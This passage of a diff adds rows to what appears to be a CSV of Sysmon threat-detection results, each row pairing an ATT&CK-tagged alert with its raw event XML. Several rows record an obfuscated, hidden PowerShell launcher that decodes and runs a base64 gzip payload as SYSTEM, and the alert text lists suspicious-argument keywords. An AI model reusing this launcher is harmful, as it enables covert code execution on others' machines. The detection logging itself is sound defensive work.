+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
+    <Data Name=""ParentProcessId"">2228</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle, -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (powershell.exe  -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:26:52.106089Z"">
+    </TimeCreated>
+    <EventRecordID>9808</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:26:51.965</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
+    <Data Name=""ProcessId"">3872</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell.exe  -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-00101C1A1900</Data>
+    <Data Name=""ParentProcessId"">3348</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436038.485479,2019-07-30T01:33:58.485479+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c netsh trace show status ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:58.286383Z"">
+    </TimeCreated>
+    <EventRecordID>4946</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:58.273</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010A7318B00</Data>
+    <Data Name=""ProcessId"">4148</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c netsh trace show status    </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe  -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:26:52.106089Z"">
+    </TimeCreated>
+    <EventRecordID>9808</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:26:51.965</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
+    <Data Name=""ProcessId"">3872</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
